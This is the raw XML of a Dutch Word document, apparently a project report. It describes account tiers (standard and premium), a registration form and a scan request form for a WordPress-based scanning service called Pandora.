                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Pandora Accounts</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC16E6" w14:textId="5DD250A9" w:rsidR="00271FB5" w:rsidRDefault="00E07DCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252398592" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C11F8C4" wp14:editId="4AF3D2CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3101527</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>7773857</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2667000" cy="12573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6670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76F7A" w14:textId="7E4A92BC" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Premiumaccount</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0597E4E9" w14:textId="5584EBFD" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alle scan opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2EFDB13B" w14:textId="2416F284" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alle rapport types</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="675E34A8" w14:textId="1F62717F" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alternatie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1F8C4" id="Text Box 18" o:spid="_x0000_s1071" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:244.2pt;margin-top:612.1pt;width:210pt;height:99pt;z-index:-250917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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="20576F7A" w14:textId="7E4A92BC" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Premiumaccount</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0597E4E9" w14:textId="5584EBFD" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="19"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004E4312">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Alle scan opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2EFDB13B" w14:textId="2416F284" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="19"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004E4312">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Alle rapport types</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="675E34A8" w14:textId="1F62717F" w:rsidR="002A05E5" w:rsidRPr="004E4312" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="19"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004E4312">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Alternatieve email</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252396544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="252DE6FA" wp14:editId="5DF8C6FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-13335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>7774940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2601595" cy="12541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01595" cy="125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6864C3" w14:textId="38E84A5A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Standaardaccount</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="37F1215A" w14:textId="65A91B93" w:rsidR="002A05E5" w:rsidRPr="00F97E77" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="18"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Enkel </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00F97E77">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Quick scan</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> als scan optie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="38994A05" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F97E77" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="18"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Enkel </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00F97E77">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Korte rapport</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> als 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E6FA" id="Text Box 14" o:spid="_x0000_s1072" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.05pt;margin-top:612.2pt;width:204.85pt;height:98.7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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3E6864C3" w14:textId="38E84A5A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Standaardaccount</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="37F1215A" w14:textId="65A91B93" w:rsidR="002A05E5" w:rsidRPr="00F97E77" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="18"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Enkel </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00F97E77">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Quick scan</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> als scan optie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="38994A05" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F97E77" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="18"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Enkel </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00F97E77">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Korte rapport</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> als optie</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00271FB5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252394496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45DAA072" wp14:editId="7FCCBAF6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2778872</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>195505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3474" cy="1483061"/>
                <wp:effectExtent l="0" t="0" r="47625" b="41275"/>
                <wp:wrapNone/>
                <wp:docPr id="6" name="Straight Connector 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3474" cy="1483061"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFD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352B2" id="Straight Connector 6"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5.4pt" to="219.05pt,1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" strokecolor="#ffd966" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07462E" w14:textId="449EBFA2" w:rsidR="00271FB5" w:rsidRDefault="00271FB5"/>
    <w:p w14:paraId="5562A07D" w14:textId="77777777" w:rsidR="00271FB5" w:rsidRDefault="00271FB5"/>
    <w:p w14:paraId="43B3B699" w14:textId="77777777" w:rsidR="00271FB5" w:rsidRDefault="00271FB5"/>
    <w:p w14:paraId="6070E798" w14:textId="77777777" w:rsidR="00271FB5" w:rsidRDefault="00271FB5"/>
    <w:p w14:paraId="66718E27" w14:textId="77777777" w:rsidR="00271FB5" w:rsidRDefault="00271FB5"/>
    <w:p w14:paraId="407C7E18" w14:textId="77777777" w:rsidR="00A754AF" w:rsidRDefault="00A754AF">
      <w:pPr>
        <w:sectPr w:rsidR="00A754AF" w:rsidSect="0096760D">
          <w:headerReference w:type="default" r:id="rId53"/>
          <w:headerReference w:type="first" r:id="rId54"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C00AC50" w14:textId="42E47B8A" w:rsidR="00A754AF" w:rsidRDefault="0075098B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253200384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5508F16E" wp14:editId="05851286">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>8366125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6478905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="786" name="Text Box 786"/>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539508" w14:textId="3AAB3733" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                            <w:r>
                              <w:t>Figuur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8F16E" id="Text Box 786" o:spid="_x0000_s1073" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:658.75pt;margin-top:510.15pt;width:70pt;height:27.4pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="37539508" w14:textId="3AAB3733" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.6</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253198336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AE11CB9" wp14:editId="6D26E4D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>8374380</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4080510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="774" name="Text Box 774"/>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523CED" w14:textId="143E558D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                            <w:r>
                              <w:t>Figuur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11CB9" id="Text Box 774" o:spid="_x0000_s1074" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:659.4pt;margin-top:321.3pt;width:70pt;height:27.4pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C523CED" w14:textId="143E558D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.5</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253196288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18169A81" wp14:editId="52642A9C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>8375015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1918335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="773" name="Text Box 773"/>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1AD880" w14:textId="621B5A7A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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69A81" id="Text Box 773" o:spid="_x0000_s1075" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:659.45pt;margin-top:151.05pt;width:70pt;height:27.4pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="291AD880" w14:textId="621B5A7A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 4.4</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007378C9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252421120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41F3C7C0" wp14:editId="709749C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-202864</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3045460" cy="2054225"/>
                <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="469" name="Text Box 469"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3045460" cy="2054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A6D813" w14:textId="01198638" w:rsidR="002A05E5" w:rsidRPr="00AC3FAA" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AC3FAA">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Registratie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18265A93" w14:textId="6AAA7D03" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A05E5">
                            <w:r w:rsidRPr="007066FB">
                              <w:t>Met het registratieformulier kunnen gebruikers zichzelf registreren om een account aan te maken.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="298AC4C4" w14:textId="12739B71" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>De standaardvelden email en URL worden door Pandora meegegeven en hoeven niet ingevuld te worden.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="24B6C36B" w14:textId="126C3385" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t xml:space="preserve">Het veld alternatieve e-mailadres kan de gebruiker invullen als hij de standaard emailadres van het Wordpress account niet wilt gebruiker. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7617A9EC" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A05E5"/>
                          <w:p w14:paraId="0250B685" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A0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C7C0" id="Text Box 469" o:spid="_x0000_s1076" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-15.95pt;margin-top:0;width:239.8pt;height:161.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="64A6D813" w14:textId="01198638" w:rsidR="002A05E5" w:rsidRPr="00AC3FAA" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AC3FAA">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Registratie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18265A93" w14:textId="6AAA7D03" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A05E5">
                      <w:r w:rsidRPr="007066FB">
                        <w:t>Met het registratieformulier kunnen gebruikers zichzelf registreren om een account aan te maken.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="298AC4C4" w14:textId="12739B71" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>De standaardvelden email en URL worden door Pandora meegegeven en hoeven niet ingevuld te worden.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="24B6C36B" w14:textId="126C3385" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t xml:space="preserve">Het veld alternatieve e-mailadres kan de gebruiker invullen als hij de standaard emailadres van het Wordpress account niet wilt gebruiker. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7617A9EC" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A05E5"/>
                    <w:p w14:paraId="0250B685" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="007066FB" w:rsidRDefault="002A05E5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007378C9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252423168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="693A56F8" wp14:editId="445B89DC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-205105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2366010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2603500" cy="1945640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="470" name="Text Box 470"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2603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B2513" w14:textId="5C051D7D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AC3FAA">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanvraag scan (standaard)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A660C76" w14:textId="021DB586" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                            <w:r>
                              <w:t xml:space="preserve">Met het standaard aanvraagformulier kunnen gebruikers enkel een soort scan aanvragen met de volgende specificaties: </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19203743" w14:textId="03F4CC73" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00542A1C">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Quick Scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="60AAF175" w14:textId="18FE0D9E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00542A1C">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Short Report</w:t>
                            </w:r>
                          </w:p>
